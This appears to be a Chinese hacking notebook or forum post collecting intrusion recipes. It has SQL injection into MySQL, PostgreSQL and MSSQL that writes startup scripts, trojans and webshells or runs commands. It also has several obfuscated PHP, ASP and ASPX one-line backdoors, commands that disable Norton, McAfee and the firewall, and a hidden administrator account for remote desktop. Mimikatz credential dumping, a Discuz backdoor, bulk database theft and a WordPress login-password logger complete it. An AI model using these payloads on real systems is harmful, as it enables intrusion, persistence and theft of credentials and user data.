5 p& B( _! z5 E0 r
+ J% B7 g+ }4 d/ _; k/ e( \中文版本操作系统中针对mysql添加用户完整代码:
& |- I C h- @0 U
; q% l; t8 f2 C/ \; ~5 W$ Kuse test;
, q9 Q+ `; q/ T- Z4 u, T+ D: X. @create table a (cmd text);
7 f! M) G$ t9 @% I0 qinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
. g7 d6 u$ P5 K3 S4 q- y, X8 ninsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
: I; c; `4 U2 f2 T Ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
X2 _2 D* I& Q3 c8 |& m7 gselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";! h7 x7 \3 Q% G( a) A
drop table a;
/ v* x# z$ K S
2 Y/ n' l) s. e, d8 Z9 ] ~英文版本:2 r/ k5 k- L2 `5 s" \
1 ]$ ?3 p6 K) [$ y3 w1 Huse test;
{- B& t) U$ w) y! z7 ^8 B7 n0 Acreate table a (cmd text);
( }$ Y% y5 B/ Q7 E' Vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
6 Y/ z% g# I4 l+ Tinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );2 ^8 r/ ~& c m! ~3 N, }( V
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );2 |8 l- {4 q( }5 i# B Y# L
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";$ [$ |. q0 c3 O) x" ]5 L0 Z! K! {% h
drop table a;% ?) j1 f! ]; B5 K3 V: U/ v
8 e! Q5 z; ^4 _# {3 mcreate table a (cmd BLOB); [2 ^! U. G0 j
insert into a values (CONVERT(木马的16进制代码,CHAR));6 x1 _3 S6 T& a) z; O
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'8 P5 F A6 X! P' C0 \/ O
drop table a;( U# d3 V y, W$ ~5 w
, D$ o: d2 w# z
记录一下怎么处理变态诺顿0 ~. J! |( ?% t2 O
查看诺顿服务的路径
0 r& ]5 Y, F$ X* Z S( s5 j5 lsc qc ccSetMgr
8 K: B' z2 @# W/ j) q3 B然后设置权限拒绝访问。做绝一点。。
% ^& ~: v6 [9 o% l7 v8 A6 \! {cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
" a: o8 J9 T, k0 ocacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
4 g) @" j+ {: r% n1 q" Z8 u( `! w7 ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators* C7 c) ?6 M3 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
7 q) C- G' G4 ~4 y; W( j1 \- m7 T f7 F! z2 H5 y) b( B. L
然后再重启服务器
w7 Y; @% X1 ~, F2 Uiisreset /reboot" ~* f9 l) N9 [& P) c
这样就搞定了。。不过完事后。记得恢复权限。。。。' \: z& [. {& X4 p( v9 } q7 h
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F/ y4 g& h a$ `, X2 A+ E L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
& O$ s A6 u9 O+ J9 Mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
- i h) T9 \) Z0 { I i D' Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F1 G/ S* K& t# _+ _& m- I! ?+ k
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin' J; i! q7 a6 G" H+ J, e0 S
0 ^6 m6 N/ l5 i# l+ D- }# Z3 G& V
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
& `) y7 h+ g/ c3 i2 G4 K" l5 q# @$ J% B( K
postgresql注射的一些东西; w( y8 h% h4 y
如何获得webshell
* P# F% y+ q( thttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
' Y4 p& m! K. phttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : [* y, @& B1 Y
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;+ i# P9 x, G0 k0 b! n
如何读文件
5 G( |6 q7 Y6 w: k4 G# p9 Chttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
N4 w& e6 h6 d, [- v% m xhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
# Y V2 F1 T( l2 z `3 whttp://127.0.0.1/postgresql.php?id=1;select * from myfile;- O- O4 U1 Z4 o) Z( h+ h8 m
# d$ n5 O3 \1 Y9 E$ y& U0 }z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
: U) g* |3 |% x当然,这些的postgresql的数据库版本必须大于8.X
: p$ O( Y9 ?, {3 G创建一个system的函数:" F" z% ^1 F- o; D9 y% t. V
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT3 \) W* G$ W0 q* d) ?
2 I4 B7 N. Y0 [创建一个输出表:; C, |1 c. [6 l
CREATE TABLE stdout(id serial, system_out text)
) i' l! S0 y0 |) e) S) p' z: e" ~ E
执行shell,输出到输出表内:6 ]; V* ]/ i2 L7 F9 \ L& g
SELECT system('uname -a > /tmp/test')- S' ^5 S' K8 ]$ I
. W' H# l9 N( y, i6 ?# |- W; j, Z. Ucopy 输出的内容到表里面;
0 H. K$ Y, D! X# H* |+ A/ [COPY stdout(system_out) FROM '/tmp/test'5 u7 \! J/ p1 @; M
$ H2 j( E6 K2 h' s
从输出表内读取执行后的回显,判断是否执行成功
' j. } {$ Q8 l, s1 ?) v9 s g. {; @5 k g2 V& O5 V
SELECT system_out FROM stdout
9 N! E) T/ u5 o; S5 z* q下面是测试例子6 Q0 u+ L6 L, G& y
x9 W1 @/ _6 }4 ]6 j/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 2 b8 ?, a( s4 }. u8 ]7 R4 ~
% A9 E( J3 N% W" }5 e4 j' P/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'( v; I% n' v0 T, \
STRICT --
& r' G3 m6 k4 `) O ]0 f @6 w7 p, b, g; k7 V
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
. D- `) T# p8 t* y: @- v4 J0 L/ Q# h3 u3 f: _
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --2 j {1 v5 q2 d9 v' D5 p- t
* ]. B; v; W" ~6 D# }2 @9 s r/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--8 Z1 i8 |! I, e* o
net stop sharedaccess stop the default firewall
4 b( B/ I; {5 dnetsh firewall show show/config default firewall: U+ D3 i3 q% L `# ~ J
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
( z# A, e/ n: Wnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall( M- A# D1 w- P& j0 ^2 o
修改3389端口方法(修改后不易被扫出)
; L1 Y) f, C! l2 O: q% h" U& Z修改服务器端的端口设置,注册表有2个地方需要修改
9 Z& S& _! L2 D7 x" j; H
) Y. `! h0 ~) [/ ?1 Q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
, S) e o1 \/ I: Y7 C9 UPortNumber值,默认是3389,修改成所希望的端口,比如6000
9 G4 O- f, U9 f8 ]' x) q: @
/ n7 v9 R, A6 c8 @' p0 }第二个地方:
# X9 d- `9 ^& J9 v1 _! c. V[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] " q) O4 ]+ _8 _8 `( h f
PortNumber值,默认是3389,修改成所希望的端口,比如60008 [! V; \. |6 n( N0 S; T& u
5 V# N! z5 ~; w8 g
现在这样就可以了。重启系统就可以了( t. V+ x2 O( w0 Y6 b. S
6 m( h" J, |- L+ J r8 k1 i查看3389远程登录的脚本 n% p6 _" L0 ~% ]& \
保存为一个bat文件
; D+ ]+ e9 ^, ]7 B# W& Qdate /t >>D:\sec\TSlog\ts.log3 Z \0 E4 Y/ q! ^$ ]
time /t >>D:\sec\TSlog\ts.log
6 u( u+ T; T) E2 F! `( C0 O+ e T; Dnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log" g' [* o. X- s, k; \
start Explorer
* I/ \0 B/ V% s8 _+ Q/ ~. {* V& |( f! F2 K' ]
mstsc的参数:
0 p+ d% l U$ V; {/ i2 d7 A" u0 \ c5 d* B1 |3 z
远程桌面连接- }7 X1 y; M7 Q8 w1 c
( Q# O/ E3 q2 n+ w; r' {
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 z. A) I9 [! f7 ?- [
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
8 E4 }' N+ f) G5 \) s# Q l
; U5 L! U6 |9 x1 J<Connection File> -- 指定连接的 .rdp 文件的名称。5 M# i6 o0 w7 q8 n
0 ?% f# p9 |& ]! V. j, c
/v:<server[:port]> -- 指定要连接到的终端服务器。
" N6 I0 q) x7 x; N( o
+ }$ _6 K! J3 w& q1 X! y/console -- 连接到服务器的控制台会话。% S- S2 {8 }: v9 M2 _1 [6 l @
$ c: O( e* S3 n5 Z' t2 I9 N! ?4 C- }
/f -- 以全屏模式启动客户端。
& b3 I7 ]& I+ g
$ t8 c0 j' a6 f# x/w:<width> -- 指定远程桌面屏幕的宽度。
^4 e5 V9 ~0 M- S1 L9 m7 l" }8 g/ x
/h:<height> -- 指定远程桌面屏幕的高度。 C1 G8 p. M! v4 w+ i
; m- N6 [3 R- {
/edit -- 打开指定的 .rdp 文件来编辑。5 A8 s0 S5 D4 U+ m
/ D, O) _$ w" u" B/migrate -- 将客户端连接管理器创建的旧版+ C* U- R2 t# K( ~2 }: B2 N
连接文件迁移到新的 .rdp 连接文件。
& V1 v3 ~/ x& p2 x9 K3 Y7 L& W$ r% s! y0 ?4 {* x5 G
) m5 Y8 t$ G. ~/ z其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
$ U3 q2 K' Y( i1 s" v! {7 nmstsc /console /v:124.42.126.xxx 突破终端访问限制数量; M, k" c1 X: G3 L/ ^, _4 m
8 K# q$ I" C+ A4 m+ }
命令行下开启3389
/ ^) o- e. y. H/ E3 @net user asp.net aspnet /add
' y$ o/ R4 P1 M# Vnet localgroup Administrators asp.net /add
( w. ~) x' j2 v) Z5 Hnet localgroup "Remote Desktop Users" asp.net /add
. G0 b! ~: d4 r* _0 o5 i! }attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D# H7 F% x* }2 F+ p& `, V
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0' A8 l5 |$ e( g9 A
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
* ^9 j" k; L' H3 mecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f) P" F7 W0 @# {/ ~% g
sc config rasman start= auto
3 `& a* Y3 V* C, B: hsc config remoteaccess start= auto
; r% t) @) q$ U0 R: m, O- Vnet start rasman
2 l& O3 z7 ~, }8 I$ Y) n, `3 Tnet start remoteaccess- | z" A7 `2 M
Media0 n( J5 x; Q( l' m& H: B7 Z
<form id="frmUpload" enctype="multipart/form-data"
' i* c, l D; Q& f$ P: Saction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>+ P2 u. p" s8 V1 _1 E. C/ R
<input type="file" name="NewFile" size="50"><br>2 A3 X% E- W' B4 @1 J6 O& P
<input id="btnUpload" type="submit" value="Upload">
# f$ _4 A) Y: E: m# z$ Q</form>
* C- R- |* l/ x" S- s. g) K: y$ n' W; J$ Q8 W0 c4 c: ^: ?
control userpasswords2 查看用户的密码
7 E9 i5 Q+ u& |; Iaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
2 {. T- e4 H! E/ B8 l, B1 Z& _SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
3 V$ j! y! j# w% @/ K% H" T0 K/ v
4 m$ u( }1 t/ Z8 i141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:* R! m/ C2 v& t
测试1:
+ M7 ]5 z7 P4 _, r2 USELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1$ m5 s6 l+ m4 q. }0 I* n
! L, ]3 n, D9 h* S! C9 t测试2:0 Y: q" Z8 | S
' c; D% O3 |( j( t3 icreate table dirs(paths varchar(100),paths1 varchar(100), id int)
8 Z' d' U7 S; ~" |+ `6 b& c) X/ T8 p+ o" U+ E, A& |7 i* P
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" o$ c% |) l% H4 v" |
& W/ p9 o( x& p% }' jSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
$ ?0 Z1 M. K+ O, j) E( u关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令' @: `, |$ m4 _
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;! e4 F5 b; Q! J1 b! W
net stop mcafeeframework
! F; [2 _) {* Z6 p9 ?net stop mcshield
2 t! `, W4 ?% Y" K- L1 L5 inet stop mcafeeengineservice
9 x2 F3 g# p+ _ M Knet stop mctaskmanager
! s B2 J; X; V& Y) N; J8 Zhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D d: ]# r3 ]6 ?- F5 Z
' V Q5 D( Z# j. N- O7 k VNCDump.zip (4.76 KB, 下载次数: 1) - z" g6 c5 l2 a; V+ ]
密码在线破解http://tools88.com/safe/vnc.php; P6 z8 O/ k& w; {2 r Z* C6 r
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
/ a+ W7 l. m# F& R* R+ {+ P- O! c( l( R- d
exec master..xp_cmdshell 'net user'
# B I7 w z& I! W1 \5 Smssql执行命令。
# B4 C% F. [2 y* }" I; m1 }5 y* D获取mssql的密码hash查询
[4 X( `" F# T( X3 h, U! H) Nselect name,password from master.dbo.sysxlogins
- s8 h3 R* D" [7 W% L9 |5 `' x Q
+ j8 @+ I5 H, o" K- b2 Dbackup log dbName with NO_LOG;' |1 e( D* ]$ o/ o4 o
backup log dbName with TRUNCATE_ONLY;
- X! f% R" ^7 ~# A( v; EDBCC SHRINKDATABASE(dbName);8 g2 _. Z0 f2 n# d E! i/ i7 ^2 b$ D
mssql数据库压缩
) x) N0 n6 c3 }5 [; e d3 ?9 {: d& n) Z1 W( H# T# w
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK, I# a/ F& ] w4 L9 X- S: o3 h) w
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
( T1 |. ?" q- F. t/ q0 @
' s0 S# M: q1 c S( r. C0 t. g! Vbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
8 X# E7 h2 W, u% @% g备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak6 O; d' c' C; A
# ^; X4 z9 S$ Z s% |Discuz!nt35渗透要点:
, g5 c( O0 j$ j(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default( D: b% n) t) d6 e/ ]6 T. e
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>. O" K, N; d4 P1 \* c) ~: B
(3)保存。7 Y2 e! H# F% f, a+ G5 x! k
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass/ O5 p# |& o" p5 f8 t% E, |9 Y
d:\rar.exe a -r d:\1.rar d:\website\8 r- }7 {+ O6 N; Z3 @ J: Z
递归压缩website7 a+ L) i6 D2 G+ }. k! N( N- Y
注意rar.exe的路径4 }& A* O; z- c8 R4 I& y
' C1 r5 _+ o4 [( E" C2 f<?php
3 `5 \4 m2 W3 q9 T6 l
5 c! ^$ A5 g- v5 U z: [$ s$telok = "0${@eval($_POST[xxoo])}";6 I7 A1 D$ [8 O- f: N% |0 }( X+ c; `
/ _3 w' L5 v5 G0 j6 u9 m; S$username = "123456";
+ ^' r+ ~' F8 f0 p* X) c+ S6 |! ]7 e8 @. F0 r9 s
$userpwd = "123456";
$ q+ S; B8 w) D5 r* v, k& X" T5 H4 E3 m9 N( W% o$ l0 j2 ^ z
$telhao = "123456";0 Z& R/ K0 x$ r
) @& N4 z0 E" [7 B$telinfo = "123456";
8 `, m* b) t) c0 q8 x. w5 d7 m. w& U: U1 t) q% D: V5 R8 b/ E0 b8 i
?>: e# O! e- f: n6 n
php一句话未过滤插入一句话木马7 n0 j( M% l! Q
! C" j; y& {: _3 H
站库分离脱裤技巧
' t- Y0 F {9 j& ~, k lexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
- Z4 h8 P; W8 k* t1 _ P! U& }exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
" V1 F$ F4 g7 r0 I/ p G条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。0 c2 K) B8 a0 p
这儿利用的是马儿的专家模式(自己写代码)。+ b( L/ D, a9 v& P: |# \" K5 L5 a% `
ini_set('display_errors', 1);
- O# Z: p; i2 m7 ]8 W j- C( J9 U; f dset_time_limit(0);" z: L3 d3 W7 }. b1 o; x& M
error_reporting(E_ALL);1 G( ` q7 j+ |5 u @ Y8 q: D
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
4 W* |1 E% }! g" Y. K1 Pmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
4 r* t- {; d9 Q) {+ ~9 ]$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
4 s `* B; o3 I v$i = 0;
5 O+ Z" c( y1 g9 A: Z9 N$tmp = '';
! o1 m' U+ j: v7 K, \- uwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {/ D V' M) Y4 Z, s
$i = $i+1;: k# p! {" N# c4 V' c
$tmp .= implode("::", $row)."\n";
& i4 a( t& Z+ N! e! J! d2 W+ @ if(!($i%500)){//500条写入一个文件
$ P9 c$ z/ N( p $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% r* J, |+ M, p. p& I( D; a file_put_contents($filename,$tmp);
6 {' e' C1 A: |0 u0 x; f $tmp = '';0 O/ p* I4 z+ j/ d$ U
}. V( D" y0 z6 u. @5 p
}4 H3 K0 \ h4 R
mysql_free_result($result);. i# X+ {3 p! z: T
" _/ m5 a* f. o5 f& @
+ \+ J+ c! T0 y
1 K( b' u4 I$ H( G//down完后delete
' j2 A6 K$ r( B' X* ?/ I' v
( @ f( C& x# D+ L# O* b; r- v+ o' ~! U1 y8 P: X
ini_set('display_errors', 1);
7 R% t* T+ x$ M2 V& |* Ferror_reporting(E_ALL);
: r& E7 x8 Y- F) t# r$ o1 R+ f$i = 0;% n5 _. D4 c$ @4 ~' E! I% [
while($i<32) {
]& H+ a/ r& Q2 r4 Z0 M* x) v: ~ $i = $i+1;
3 f6 E0 n( m6 t* o5 T $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';9 e# d2 } O7 g' j, M& m g
unlink($filename);
6 ]' ~1 U1 n- ~9 n- M7 t( i} ' ]8 R; v: w; c( D2 y! }- _
httprint 收集操作系统指纹
1 f# Z( y1 `/ D) P) A7 U扫描192.168.1.100的所有端口) J) T' ^# ?7 W) n& `: {$ ^0 d3 y
nmap –PN –sT –sV –p0-65535 192.168.1.1008 Z2 P, r/ m4 N2 G$ Z- s
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
8 `/ B5 Q: w( A5 a' a3 shost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
5 e+ h+ m! a) F& lNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host) i; y2 ]" \6 e' H
, f8 N: U5 O% F [# k& k2 Z: @. V
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
$ m1 O- g, V2 K% ?7 U- K7 B5 R
6 |2 }7 I% K/ A- ] MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)6 s* C$ L6 g+ D% ]
; x0 U' x- h" V! ~4 K
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
- w4 e3 a+ ~' B" t+ V* H
- _# v( s n5 o DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
( z" p0 ]* d4 p/ n# b
/ N# }( E8 e7 y6 O http://net-square.com/msnpawn/index.shtml (要求安装)
' }$ H. T" [" @* z( e5 {% s5 e
; M5 g- ~2 c9 v# X tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& y# P+ t. T5 ]& ?: \. G5 j6 U: Y7 b2 B8 V# ?3 H% D$ o) Y4 E
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)$ e& \6 T# a' p6 {9 z5 K- w$ g
set names gb2312( [6 L9 @9 W/ ]% S% p- b* R
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
# L3 O" u+ @9 X6 |- T: A! V* P0 V1 { U+ j8 Y: c" {" P6 F9 e
mysql 密码修改
1 I" _" @% }+ F. d/ pUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 8 a1 Y; i5 D, v' r3 N
update user set password=PASSWORD('antian365.com') where user='root';
) D$ Q p \+ q( L4 |9 |flush privileges;: o3 ]5 C3 |; Z9 d
高级的PHP一句话木马后门. i1 K! {; Z0 U I, [
: i, {- v3 k1 h* x, q' g: b入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀* V# J! U* ?# d& M) s( G* Y# S) q% x
0 p; W# z! O$ E+ [2 a1 _* a1 a$ K1、
1 ]4 I5 c7 S/ k; }
+ ]: `; e: q* D2 |. k$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
/ n6 k, L" F$ d. X# b+ _( w8 ]% r- Y
$hh("/[discuz]/e",$_POST['h'],"Access");
1 F( P5 a/ @" _% O, L% I) g9 V& e0 O. t! @& O1 A) x
//菜刀一句话
% Z- O1 U& v: P
% |$ S4 _" v% A# ^0 I. X, h2、9 h( L# V+ Q1 Q, ^" H2 G% {, b- Y
8 ~& Y H/ m5 q4 Q! C3 r, p$ g* u$filename=$_GET['xbid'];2 u; t9 U9 Z) }
6 h/ C L6 T; F, X0 E4 ~include ($filename);8 Y p" U, r2 d. S; O
3 O- [6 d {% H' _
//危险的include函数,直接编译任何文件为php格式运行$ N& t3 P3 S9 U: N, u' [
( H% ^/ D% p- S3、
" ]( S( O0 h+ J+ |
5 V! X$ I7 B8 v# b) q. B* ~$ |$reg="c"."o"."p"."y";
# @/ W( R; ?1 e! a0 P
; K, g/ K: U5 F2 R# {; n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);1 o& \7 a' s$ b% _6 v& N" O
6 {( u' A, ?$ d//重命名任何文件
* Y, Z! H* c v, b8 O4 U. V) o3 v) N4 h+ h
4、9 e5 f# R" v# i7 D. y) c4 m7 t$ N
7 ^/ Q' v. n6 E/ b; p4 N, m$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
4 V, V1 X7 i' x0 C" u5 O
! [0 W* f7 u% Z; X% A9 {$ u$gzid("/[discuz]/e",$_POST['h'],"Access");$ s+ `) @! w/ I, \9 U W
9 W% i( X6 I6 Q, Q8 P
//菜刀一句话
; a/ ~5 n/ q9 H. r
7 m5 c( Q. ~7 \& i6 g5、include ($uid);
7 ~. ?; `, ]6 l/ R! A. ^* \1 O& n6 n/ H) { b8 j) O
//危险的include函数,直接编译任何文件为php格式运行,POST
$ w$ D' _' h- n' H2 l
. ]: X* B0 J- d! r/ r
2 m0 O& o' t5 p//gif插一句话
0 T1 y* S2 X9 Z( g/ W- S3 D. h# Q9 r/ @/ h# m$ T, Z
6、典型一句话- m6 {) ]$ V3 E& {/ Q) T; j
1 |& F& n* D( X9 X
程序后门代码
7 T2 f; I X( U<?php eval_r($_POST[sb])?>
) W" n% _: |% ]1 ?! _& x5 b! O, r程序代码
/ G6 s7 V7 D. U; ]% O( `<?php @eval_r($_POST[sb])?>5 y8 I8 Q' E$ ^0 P8 p
//容错代码8 H1 D/ g8 ^2 W0 k9 a3 T
程序代码1 ~& T' s" T5 T/ E7 d
<?php assert($_POST[sb]);?>! w9 T1 i) N: t% f0 I
//使用lanker一句话客户端的专家模式执行相关的php语句: \2 b6 e( H4 u$ x
程序代码
0 J" X; ~3 X% q<?$_POST['sa']($_POST['sb']);?>. T# |0 \2 T0 k5 E$ f
程序代码
8 k* @, H3 i* k6 f( N' A7 c) L<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
" [- E6 w+ p+ P; [2 f+ x程序代码
" p- Z8 E" [! x* F- ^* D1 X- g<?php, B+ B% ]2 p9 z7 L1 J5 B
@preg_replace("/[email]/e",$_POST['h'],"error");
: T# ?- E4 l; k: |) H- L* `?>
1 H% a o9 _! H8 y//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入1 E$ {$ P- Z6 R* |
程序代码# O& _/ K3 i- N4 Y! S% L- o
<O>h=@eval_r($_POST[c]);</O>
0 j1 ]0 s/ `- R5 c) l2 S% v程序代码
% y( Y5 `6 j" u<script language="php">@eval_r($_POST[sb])</script>
6 q0 }6 B# L+ J% ~$ J2 H//绕过<?限制的一句话
6 W* t, N u2 s! w% z
1 u6 ]; G3 L% ^2 J5 ihttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
% a) O5 T) W: ^( S6 Y& ]4 x( Z4 n详细用法:
, K# t% ~. j$ L. [2 c0 g! X1、到tools目录。psexec \\127.0.0.1 cmd
. w# t1 s# @1 C: g7 C2、执行mimikatz) w2 l: R# ?. h0 X
3、执行 privilege::debug
3 d" ^) C2 `% a+ [6 W0 t; C" }4、执行 inject::process lsass.exe sekurlsa.dll
T4 h/ z) u4 @: Y3 u5、执行@getLogonPasswords @# c; `# _( m# {
6、widget就是密码, Y5 }" U$ ~$ m A3 |
7、exit退出,不要直接关闭否则系统会崩溃。
- Z9 l. t9 V& A, a: _' r' ?# z- a& S1 i
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面# i" z6 @( P7 e% D# k6 {9 a
" M: R E: D' o% Y l) g4 q
自动查找系统高危补丁+ F. r X: N4 ~/ [! S
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
$ }1 [: N/ `) C$ q) X/ s+ U& W0 p% [1 B- u: E% c
突破安全狗的一句话aspx后门
; i$ h& q. \1 a0 n<%@ Page Language="C#" ValidateRequest="false" %>
3 E& k* d+ q/ h( x<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
3 E& Z B$ D0 U S3 I& Q3 u- c! fwebshell下记录WordPress登陆密码
# h$ e9 r5 J3 _4 u6 h" Zwebshell下记录Wordpress登陆密码方便进一步社工
8 d) `/ L3 S) ]7 O! r在文件wp-login.php中539行处添加:
& f2 I+ B5 p ?! r' Q' A// log password
: H! k8 h9 y/ w* n5 y$log_user=$_POST['log'];
% L0 o* w! y" E( S7 I% u7 \8 L+ ~2 ^$log_pwd=$_POST['pwd'];# }" m9 W2 z0 ?( j7 r5 \# K
$log_ip=$_SERVER["REMOTE_ADDR"];
. Q* M0 F; S. |/ N: ~) x7 H& p$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
" U C" f. X* f! d V$ w$txt=$txt.”\r\n”;1 }: j' |3 }4 g/ r* T/ B
if($log_user&&$log_pwd&&$log_ip){
6 ?1 t& V2 A) k* [6 v- r# q: u' a" [! D@fwrite(fopen(‘pwd.txt’,”a+”),$txt);/ K' y8 f! K9 R2 W
}% K% Q- D' r& C* ?8 B0 L0 j
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
, M$ u# @5 y" _4 Y就是搜索case ‘login’
